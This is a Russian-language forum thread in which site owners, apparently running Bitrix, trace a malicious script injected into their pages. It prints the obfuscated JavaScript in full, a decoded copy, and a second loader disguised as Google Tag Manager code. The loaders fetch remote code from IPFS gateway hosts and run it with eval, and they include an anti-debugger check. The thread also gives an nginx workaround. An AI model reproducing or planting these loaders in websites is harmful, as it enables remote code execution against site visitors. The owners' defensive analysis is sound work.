Цитата |
---|
написал: Цитата |
---|
написал: Цитата |
---|
написал: В отладчике |
Такая же проблема, подскажите, нашли источник? |
Источник нет. На сайте выполняется этот скрипт Код |
---|
!window[ '\x5f\x5f\x65\x78\x6f\x63\x6c\x69\x63\x6b' + '\x5f\x5f\x61\x64\x73\x5f\x5f\x73\x68\x6f' + '\x77' ] && (window[ '\x5f\x5f\x65\x78\x6f\x63\x6c\x69\x63\x6b' + '\x5f\x5f\x61\x64\x73\x5f\x5f\x73\x68\x6f' + '\x77' ] = '\x31' ,
( function () {
var _0x5d2ae4 = window[ '\x6c\x6f\x63\x61\x74\x69\x6f\x6e' ][ '\x68\x72\x65\x66' ];
fetch( '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61' + '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73' + '\x2e\x36\x39\x2e\x6d\x75\x2f\x70\x72\x6f' + '\x62\x65\x2f\x76\x31\x2f' + _0x5d2ae4),
fetch( '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61' + '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73' + '\x2e\x36\x39\x2e\x6d\x75\x2f\x70\x61\x79' + '\x6c\x6f\x61\x64\x2f\x76\x31' )[ '\x74\x68\x65\x6e' ](_0x3faf80=>{
return _0x3faf80[ '\x74\x65\x78\x74' ]();
}
)[ '\x74\x68\x65\x6e' ](_0x549b7f=>{
_0x549b7f && _0x549b7f[ '\x73\x74\x61\x72\x74\x73\x57\x69\x74\x68' ]( '\x68\x74\x74\x70' ) && fetch(_0x549b7f)[ '\x74\x68\x65\x6e' ](_0x1eb34c=>_0x1eb34c[ '\x74\x65\x78\x74' ]())[ '\x74\x68\x65\x6e' ](_0x5b2773=> eval (_0x5b2773));
}
),
setInterval( function () {
var _0x33417b = Date[ '\x6e\x6f\x77' ]();
debugger ; var _0x3a3f12 = Date[ '\x6e\x6f\x77' ]();
if (_0x3a3f12 - _0x33417b > 0x3e8 ) {
fetch( '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61' + '\x74\x65\x77\x61\x79\x2e\x69\x70\x66\x73' + '\x2e\x36\x39\x2e\x6d\x75\x2f\x64\x65\x62' + '\x75\x67\x2f\x76\x31' + window[ '\x6c\x6f\x63\x61\x74\x69\x6f\x6e' ][ '\x68\x6f\x73\x74' ]);
for ( var _0x53089b = 0x5 ; _0x53089b > 0x3 ; _0x53089b = _0x53089b + 0x1 ) {
console[ '\x6c\x6f\x67' ](_0x53089b);
}
}
}, 0x64 );
}()));
|
В расшифрованном виде получается что-то такое Код |
---|
!window[ '__exoclik' + ' __ads_sho' + 'w' ] && (window[ '__exoclik' + '__ads_sho' + 'w' ]
( function () {
var _0x5d2ae4 = window[ 'location' ][ 'href' ];
fetch( 'https://ga' + 'teway.ipfs' + '.69.mu/pro' + 'be/v1/' + _0x5d2ae4),
fetch( 'https://ga' + 'teway.ipfs' + '.69.mu/pay' + 'load/v1' )[ 'then' ](_0x3faf80=>{
return _0x3faf80[ 'text' ]();
})[ 'then' ](_0x549b7f=>
_0x549b7f && _0x549b7f[ 'startsWith' ]( 'http' ) && fetch(_0x549b7f)[ 'then' ](_0x1eb34c=>_0x1eb34c[ 'text' ]())[ 'then' ](_0x5b2773=> eval (_0x5b2773));
}),
setInterval( function () {
var _0x33417b = Date[ 'now' ]();
debugger; var __0x3a3f12 = Date[ 'now' ]();
if (_0x3a3f12 - _0x33417b > 0x3e8 ) {
fetch( 'https://ga' + 'teway.ipfs' + '.69.mu/deb' + 'ug/v1' +window[ 'location' ][ 'host' ]);
for ( var _0x53089b = 0x5 ; _0x53089b > 0x3 ; _0x53089b = _0x53089b + 0x1 ) {
console[ 'log' ](_0x53089b);
}
}
}, 0x64 );
}()));
|
Он подгружает несколько скриптов с gateway.pinata.cloud:
gateway.pinata.cloud/ipfs/QmeFQQveaX32GqrauAuj9uBqBGQbUB7NHcmr96aoeeiVV8 gateway.pinata.cloud/ipfs/QmQ9t1MbZnmEayTmcSqSyMiLNRCCiZiviWdNXYAhHDDVdZ
Как временное решение в nginx (/etc/nginx/bx/conf/bitrix_block.conf) прописал для ip этого сайта Далее перезагрузил nginx - service nginx restart
Не знаю насколько это работает) |
Два дня убил на поиск откуда этот скрипт лезет, итог поиска дал свои результаты. Лезет из
Код |
---|
(function(w,d,s,l,i,j,k,m){w[s]||(w[s]=1,w[d(j)](d(k))[s](c=>c.text())[s](c=>w[d(i)](c)))})(window,atob,'then','https://www.googletagmanager.com/gtm.js?id=','ZXZhbA==','ZmV0Y2g=','aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtTm1TZlljbThSYm5YUEVvWnJkVHpEdjdpTGY0ekVUaEVrem1penFjZVdDUEE=','e249af6d')
|
именно он подгружает вирус, а вот где лежит этот сам googletagmanager так и не получилось найти, есть подозрение в что одном из файлов webp. Временное решение это вырезать этот код на уровне сервера, что собственно и сделал пока не найдётся полное решение.